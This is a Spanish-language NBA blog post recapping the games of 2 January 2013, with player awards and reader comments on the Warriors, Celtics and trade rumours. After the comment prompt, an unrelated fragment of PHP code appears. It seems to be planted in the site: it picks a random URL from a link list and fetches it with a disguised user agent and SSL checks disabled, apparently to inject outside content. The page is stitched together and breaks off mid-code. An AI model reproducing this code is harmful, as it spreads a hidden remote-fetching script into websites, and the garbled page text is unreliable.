La Crónica: Pierden los líderes del oeste

03 de January de 2013 por Simon

Nada hacía pensar anoche que Brooklyn pudiera vencer en el Chesapeake Energy Arena de Oklahoma City, los Thunder venían de 12 partidos seguidos ganados en su pabellón mientras que los Nets habían perdido 4 partidos seguidos fuera consecutivos. Pero claro si tus dos mejores jugadores, grises durante toda la temporada les da por rendir a la vez de la forma en que a principio de temporada se esperaba de ellos tienes muchas papeletas de dar la sorpresa. Y precisamente eso le pasó a Durant y compañía, no esperaban ese ciclón llamado Joe Johnson que les anotó 20 puntos en la primera mitad para llegar a tener ventajas superiores a los 20 puntos durante el segundo cuarto. En el final del segundo, tercero e inicio del cuarto Thunder -recortó hasta llegar al empate a 85, había partido. Pero en el mismo instante del empate, el partido se volvió a acabar, parcial de 25-8 en 7 minutos y victoria para los Nets. Durant fue expulsado por protestar a falta de dos minutos con el partido sentenciado. JoJo acabó con 33 puntos, López con 25 y Deron con 19 puntos y 13 asistencias. (110-93).

Golden State Warriors aprovecharon su buen momento para vencer a Los Angeles Clippers que perdieron su segundo partido seguido tras su increíble racha de victorias. El partido fue controlado desde el salto inicial por los Warriors que no dieron ninguna opción a unos muy desacertados Clippers por segundo partido consecutivo. Curry sumó 31 puntos 8 asistencias y 6 rebotes apoyado por Lee, que otro día mas se marcó un partidazo de impresión con 24 puntos 13 rebotes y 7 asistencias. En Clippers apenas Barnes y Crawford estuvieron a la altura. (94-115).

La derrota de los dos líderes del Oeste y de la Liga, la aprovecharon sus dos máximos perseguidores, San Antonio ganó en Milwaukee con un Duncan espectacular como siempre, en un partido prácticamente sin historia en el que Spurs ya habían sentenciado al descanso. (117-100). Mientras tanto Memphis daba buena cuenta de los Celtics en el Garden, que al contrario de lo que es habitual en ellos no tuvieron una gran aportación por parte del juego interior, apenas 11 puntos y 15 rebotes para Marc y Zach combinados. Fueron Allen y Conley, acostumbrados a labores más sucias como la defensa los que llevaron el peso ofensivo del equipo y los guiaron hacia una victoria que los acerca a los puestos cabeceros y no permite que Golden State los adelante. Boston está fuera de Play Off. Algo tiene que cambiar en Boston pues su futuro esta temporada se ve muy negro. (93-83).

Miami precisó de una prorroga ante unos Mavs en los que Nowitzki empieza a coger ritmo y Mayo a un nivel espectacular. El partido fue muy igualado con constantes alternativas para ambos equipos. Dallas jugó bastante mal los últimos minutos y desperdició una bonita renta de 6 puntos en los últimos 3 minutos. Allen puso el partido 2 arriba para Heat a falta de 15 segundos pero Nowitzki logró la igualada a falta de 4 segundos. Lebron erró el último tiro forzado. En la prórroga los vigentes campeones no dieron opción y terminaron ganando el partido con una cómoda renta de 10 puntos. Lebron se quedó a una sola asistencia del triple doble (32-12-9) y Wade aportó 27 puntos. En Dallas, Mayo acabó con 30 puntos y Nowitzki con 19. (109-119).

En el resto de la jornada guión previsto salvo la pequeña sorpresa de la victoria de Phoenix ante Philadelphia con unos grandes Scola y Dragic. Los Jazz vencieron en casa a Minnesota con un gran partido de Hayward y Kanter desde el banco y hasta 6 jugadores en dobles dígitos. En

Minny, Love sigue sin jugar a un buen nivel y Rubio se perdió el partido por problemas en la espalda. (84-106). Toronto venció a Portland con un Ross colosal que pide cada vez mas minutos, y no sé cómo no se los dan, 26 puntos 5 rebotes 2 asistencias y 2 robos en solo ¡25 minutos! Ed Davis sigue dando un gran rendimiento con 19 puntos y 7 rebotes. Calderón no anotó pero sumó 13 asistencias. (79-102). Houston sumó otra victoria con otro nuevo partidazo de James Harden ante New Orleans Hornets. (92-104).

Chicago venció sufriendo a pesar de tener el partido controlado durante los primeros 35 minutos. El mejor del partido fue Boozer para chicago. Nelson se marcó otro partidazo sin recompensa (96-94). Sacramente venció a Cleveland con Cousins en su nuevo rol de facilitador tras volver de su sanción. (97-94). Indiana venció en casa a Washington con un colosal Paul George (81-89).

PREMIOS:

MVP: Dos candidatos. Por un lado el incombustible Tim Duncan, arrasando el juego interior de los Bucks con 28 puntos, 13 rebotes, 6 asistencias, 3 tapones y 1 robo y por el otro Stephen Curry frente a los Clippers. 31 puntos, con 6 de 8 en triples, 6 rebotes, 8 asistencias y 2 robos. Teniendo en cuenta el mérito extra de ganar a los Clippers nos inclinamos por el segundo.

Rookie: Brilló Terrence Ross y lo hizo precisamente en presencia de Lillard, que también estuvo fantástico. 26 puntos (6 de 9 en triples), 2 rebotes, 2 asistencias y 1 robo en sólo 25 minutos. Tiene hambre de más.

La sorpresa: No debería serlo, pero un año gris el partidazo de Joe Johnson sabe doblemente mejor ganando a los todopoderosos Thunder. 33 puntos con mucho acierto, 5 rebotes, 3 asistencias y 1 robo.

La decepción: No sólo es que Blake Griffin estuvo desacertado (2-11) sino que David Lee le hizo un hijo en su lado de la pista. Por suerte podemos considerarlo anecdótico.

El mayor esfuerzo en vano: Llevaba unas semanas bastante frío. Anoche OJ Mayo se destapó con un partidazo ante Wade y los campeones, a un tris de amargarles la velada. 30 puntos, 3 rebotes, 6 asistencias… que se fueron por el desagüe de la prórroga.

Comenta

29 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    La cuestión por Boston es cómo mejoras el equipo,con lo que tienes o con algún traspaso.Verdaderamente acudir al mercado con las supuestas piezas traspasables del equipo (Green,Sullinger,Bass..) no te garantiza obtener nada a cambio que te asegure cambiar la dinámica así que la cosa pinta mal.¿Rondo,Pierce o KG se pueden mover?Rondo es el presente del equipo,Pierce le queda este y otro año y sinceramente despues de toda una vida en verde sería ridículo plantearse un traspaso y KG si sigue jugando en la NBA es por Doc Rivers,él mismo lo dijo.La situación para la temporada que viene pinta de la misma forma con unos 70 millones comprometidos.

    Su destino debería ser sufrir lo que pudiesen para colarse en PO -es el este de todas formas- y en postemporada todos son igual de peligrosos.

      Citar

  2. Viva_Dirk dice:
    #2

    Bueno, de lo que va de temporada, a parte de los 2 claros candidatos al MVP, Lebron&Durant y del rendimiento individual de Kobe, para mi lo mejor del curso es Stephen Curry, tras un año de lesiones esta haciendo exhibiciones casi cada noche y esta haciendo méritos para colarse en uno de los 3 mejores quintetos de la temporada.

    Sus rivales como mejor base del curso serían Chris Paul y Tony Parker, y no me atreveria a decir que la temporada de ninguno de ellos sea mejor que la del de los Warriors. En su contra estaría el apartado defensivo donde aunque no es el agujero de otras temporadas siempre va a tener muchas dificultades.

    Y luego esta el apartado puramente visual, en el que Curry es una pasada, es todo clase y talento. Por algo los Warriors son el 2º equipo al que mas partidos he visto este año, solo detrás de los Lakers.

      Citar

  3. TheDeerHunter dice:
    #3

    ¿Y David Lee qué dice de eso?

      Citar

  4. Esteban dice:
    #4

    lo dije el otro dia y lo repito, david lee esta jugando a modo MVP

    hace unos dias subieron un articulo sobre malone, y creo q a lee le pasa algo similar, la falta de estetica en su juego, sumado a q tiene un fisico esteticamente horrible, le quita miradas, pero su practicidad, sencilles y recursos bajo el aro estan a un nivel superior al de muchos 4 de la liga, sobretodo de grifffin (no me atreveria a decir que de LOVE)

    esta encajando una temporada para enmarcar, su equipo es la gran sorpresa de la liga y el un 20-10 automatico en el 5to mejor equipo del oeste

    es un tio que se va hasta los 20 puntos sin necesidad de un ssitema para el, sion lanzar de mas y sin firuletes, un espectaculo, de seguir a este ritmo, solo quedara afuera del mejor quinteto por que carmelo sera puesto como 4, pero no hay hoy por hoy un ala pivote que jugando al nivel de lee haga ganar tantos partidos a su equipo

      Citar

  5. Esteban dice:
    #5

    sobre BOSTON, para mi la mejora esta dentro del equipo, via traspaso no conseguiran mucho

    sullinger con ese fisico no creo que sea muy querido
    bass es un buen jugador de rotacion o un 4 util, pero nadie dara nada que le cambie la ecuacion a los celtics por el
    y green tiene un contrato demasiado largo y caro para lo que ha demostrado este año

    la solucion en mi punto de vista es que pase a la titularidad GREEN como ala pivote y que sea la referencia ofensiva del equipo, a la altura de PIERCE, es decir, que lo exploten al maximo maximo, a ver si puede ser ese tio capaz que anotar todas las noches 20 puntos

      Citar

  6. Viva_Dirk dice:
    #6

    Como digo, he visto muchos partidos de los Warriors y para mi sin duda el alma del equipo es Curry. David Lee esta haciendo un temporadón, también estará en uno de los 3 quintetos seguramente si acaban bien clasificados.

    Yo no le infravaloro por no se espectacular, pero desde luego los Warriors tienen sistemas para el, tanto en el poste bajo como para que lance desde la media distancia. Es un gran reboteador y ha madurado muchísimo su juego, algo que se nota en el número de asistencias. Atrás es tan flojo como Curry, pero ganas le pone.

    Eso si, diria que Duncan esta siendo el mejor ala-pivot del año, y tampoco estará en el primer quinteto salvo que le metan de center, los puestos de forward son para Lebron y Durant.

      Citar

  7. Esteban dice:
    #7

    por lo que he visto de los spurs, duncan esta jugando todos y cada uno de sus minutos de center

      Citar

  8. Jones dice:
    #8

    Si Curry y Lee son tan malos ofensivamente como decís, ¿por qué Golden State es considerado el quinto mejor equipo defensivamente de la liga, justo por detrás de los Clippers? Yo creo que aquí hay problemas de sensaciones, porque el equipo de Oakland está defendiendo, y muy bien

      Citar

  9. rumbero dice:
    #9

    Jones:
    Si Curry y Lee son tan malos ofensivamente como decís, ¿por qué Golden State es considerado el quinto mejor equipo defensivamente de la liga, justo por detrás de los Clippers? Yo creo que aquí hay problemas de sensaciones, porque el equipo de Oakland está defendiendo, y muy bien

    Yo también me he visto unos cuantos partidos de los Warriors y es cierto que estan defendiendo como no lo habían hecho en años pero a su vez seguramente la defensa no sea la mayor virtud de Curry y Lee y eso que lo estan haciendo mejor que nunca. Son dos tipos que por su físico suelen tener dificultades, pero como decía Viva eso no quita que le echen huevos y ahi tienes a uno de ellos pegándose con tios más grandotes de él para llevarse sus 10 rebotes por noche. Precisamente en el tema de los rebotes es donde han hecho un cambio brutal pasando de ser el peor equipo a ser el tercero de toda la liga. A partir de ese control en el rebote y de la intensidad en defensa que ponen los nuevos y los rookies (Ezeli y Green estan para eso pero ojito con Barnes porque el tio defiende de maravilla) pues estan donde estan. Si últimamente hasta Briedrins cumple.

    Buena nota tendrian que tomar en Boston precisamente porque gran parte de sus problemas vienen de su defensa. Se me hace difícil de entender como han bajado tanto el nivel defensivo cuando con Doc en el banquillo había sido hasta ahora su gran sello de identidad. El año pasado ya reaccionaron a media temporada, a ver esta…pero la verdad es que se les ve con una caraja importante

      Citar

  10. Enzo dice:
    #10

    Si Bogut vuelve bien de su lesion estos Warriors seran aun mas peligrosos, por que para mi Bogut sano es el mejor pivot de la liga claro defensivamente .

      Citar

  11. Enzo dice:
    #11

    Ah y sobre Boston una pena lo de Milicic realmente crei que Doc Rivers podria haber sacado algo bueno de el , Darko es mucho mejor que Collins.

      Citar

  12. nba dice:
    #12

    Deseando que llegue el partido del viernes para ver cuantos “posters” le hace Griffin a Gasol y cia,supongo que aprovechara para desfogarse despues de todas las leches que se esta llevando

      Citar

  13. Esteban dice:
    #13

    nba:
    Deseando que llegue el partido del viernes para ver cuantos “posters” le hace Griffin a Gasol y cia,supongo que aprovechara para desfogarse despues de todas las leches que se esta llevando

    dudo que eso suceda, si prestas atencion, griffin ya le quizo hacer la gran mozgov y perkins a sullinger y erste lo hizo volar por los aires, y ayer, el futno fue de green quien lo derribo y lo dejo con un chichon

      Citar

  14. Esteban dice:
    #14

    sueño despierto o alguien mas ve un posible trade entre boston y kings?

    Rivers podria hacer algo grande de cousins, y los celtics merecen estar a la altura de las circunstancias nuevamente, junto con los lkaers son los mas grandes de la liga, no hace mucho ambos eran lideres e conferencia y eso molaba

    que pueden ofrecer los celtics? en primer luigar sin duda Sullinger y Green como dos piezas jovenes validas, pero que mas? le ha quedado alguna seleccion buena del draft via traspaso? bradley podria entrar en la chachara?

      Citar

  15. simon dice:
    #15

    Esteban:
    sueño despierto o alguien mas ve un posible trade entre boston y kings?

    Rivers podria hacer algo grande de cousins, y los celtics merecen estar a la altura de las circunstancias nuevamente, junto con los lkaers son los mas grandes de la liga, no hace mucho ambos eran lideres e conferencia y eso molaba

    que pueden ofrecer los celtics? en primer lugar sin duda Sullinger y Green como dos piezas jovenes validas, pero que mas? le ha quedado alguna seleccion buena del draft via traspaso? bradley podria entrar en la chachara?

    Boston no tiene piezas para traerse ningun jugador de ese tamaño.

      Citar

  16. max dice:
    #16

    Toronto ha ganado ocho de sus últimos diez partidos, y la reacción ha sido a partir de la baja de Bargnani. Parece que juegan mucho mejor sin él.

      Citar

  17. R1Molano dice:
    #17

    Excelentes Lee y Curry. La parte que le toco a cada uno ayer (segunda y primera, respectivamente) fue para grabarla.

    Pero yo le doy muchísimo merito a la temporada de Jack, es al jugador al que nos agarramos cuando necesitamos tranquilidad, anotar puntos importantes…

      Citar

  18. Esteban dice:
    #18

    jack y landry resultan fundamentales en los warriors, son anotadores totales a los que les falta cierta pizca para ser estrellas de la liga, pewro como suplentes simplemente se salen

    habra q ver que puede aportar jefferson y si se contagia de la buena onda del equipo

    con el son un plantel aun mas completo

    hablando de milagros e imposibles, si vuelve bogut sano algun dia y puede jugar todos los PO, muchisimo cuidado con este grupo, atencion enserio, con bogut sano howard no mete el mas minimo miedo…

      Citar

  19. simon dice:
    #19

    http://www.youtube.com/watch?feature=player_embedded&v=gGLe87ZkL_k
    Madremia, es probable que sea la cosa mas vergonzosa que he visto en mi vida a un arbitro…

      Citar

  20. Jose Luis dice:
    #20

    3 arbitros para esto…

      Citar

  21. R1Molano dice:
    #21

    Jefferson salvo lesión o cambio en la rotación por ahora jugando poquillo o nada. Si hay lesiones podría entrar.
    A mi Landry me parece un jugador importante, sobretodo sin Bogut, pero es que Jack es fundamental.

      Citar

  22. R1Molano dice:
    #22

    Madre mía que dobles xD

      Citar

  23. Denise dice:
    #23

    simon: Boston no tiene piezas para traerse ningun jugador de ese tamaño.

    En algunas webs se habla de Cousins por Sullinger, Melo y Green…pero me parece una broma, un atraco a mano armada a los Kings.

    También suenan los Bulls, y éstos tienen mas piezas decentes como Gibson, e incluso Boozer metiendo a otro jugador de los Kings como Salmons o Garcia

      Citar

  24. simon dice:
    #24

    Sacramento solo saldría beneficiado en un trade con Boston si consigue a Rondo, los demás no le sirven para nada, Garnett y Pierce por mayores para un proyecto a medio plazo y los demás por no dar el nivel de Cousins. Y Rondo es demasiado para dar a cambio de Cousins… asi que Boston es un equipo que yo descartaría para un traspaso.

      Citar

  25. Denise dice:
    #25

    simon: Sacramento solo saldría beneficiado en un trade con Boston si consigue a Rondo, los demás no le sirven para nada, Garnett y Pierce por mayores para un proyecto a medio plazo y los demás por no dar el nivel de Cousins. Y Rondo es demasiado para dar a cambio de Cousins… asi que Boston es un equipo que yo descartaría para un traspaso.

    Bueno, siempre está la opción de un trade a 3 o 4 bandas y que Cousins recale en Boston; pero salvo timo a Kings, no creo que puedan conseguirlo en un trade que solo involucre a estos 2 equipos.

      Citar

  26. GreenPride dice:
    #26

    Bueno de este día he visto el Celtics-Grizzlies y el Warriors-Clippers.
    En Boston continúa el descalabro. Doc no da con la tecla, el equipo defiende poco y no rebotea nada de nada, quizás su gran problema. En ataque se atascan con asiduidad y eso que este año tienen mejores piezas atacantes que el año pasado. Sobre el traspaso que se habla yo no creo que los Kings piquen pero sería fenomenal para Boston. Si no, yo creo que hay que dejar que Bradley vuelva a ser el del año pasado y que la defensa mejore o si no va a ser una temporada muy larga para los verdes. Ahora mismo cualquier equipo con cara y ojos les gana con facilidad. Una gran decepción su temporada aunque el año pasado reaccionaron a tiempo… veremos que pasa este.
    En Oakland, partidazo de los warriors. Si tus dos jugadores franquicia son CP3 y Griffin y son claramente superados por Steph Curry y David Lee pues apaga y vamonos. Fenomenales los Warriors que además de sus titulares tienen un banco de lo más interesante con Jack y Landry. Vamos que ya contribuye hasta Biedrins que estuvo muy bien en defensa en los minutos que jugó (lo escribo y casi no lo creo). Barnes y Thompson son dos jugones y el equipo está enrachado. Cuidado con ellos. Los Clippers han perdido algo de fuelle tras su gran racha de victorias pero creo que no es de preocupar. Volverán a coger pronto el hilo aunque Jordan y Griffin hayan estado horribles en estos dos partidos. Sin ellos a buen nivel los Clippers bajan mucho. Por cierto, increíble el nivel al que está jugando Matt Barnes, temporadón el suyo

      Citar

  27. Esteban dice:
    #27

    se le da mas valor a cousins del que tiene y creo que los kings son concientes de ello

    el tio promedio 17 y 12 es cierto, pero siempre en uno de los peores equipos de la nba, y no se erige como un lider que pueda cambiar esa situacion, no mejora aspectos de su juego y cada año tiene un problema diferente con su entrenadro, ni hablar de compañeros y rivales

    por mas talento q tenga, cree alguien que los kings pueden armar un equipo competitivo y ganador con cousins como jugador franquicia? lo ven liderando algo q no sea un caos?

    los kings si son inteligentes, aceptaran recibir menos talento (talentos como cousins casi no hay siendo pivote), a cambio de recibir algo mas de cabeza y liderazgo

    es lo que yo haria

      Citar

  28. simon dice:
    #28

    Vale esteban llevas razon en lo que dices de Cousins pero aun asi Sullinger, Fab Melo y Green no les vale de nada a los Kings.

      Citar

  29. Esteban dice:
    #29

    simon:
    Vale esteban llevas razon en lo que dices de Cousins pero aun asi Sullinger, Fab Melo y Green no les vale de nada a los Kings.

    quiza simon, ese trade es un atraco por donde se lo mire, quiza si agregaran a bradley y los celtics se comieran algun contrato malo de los kings tendria mas sentido

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>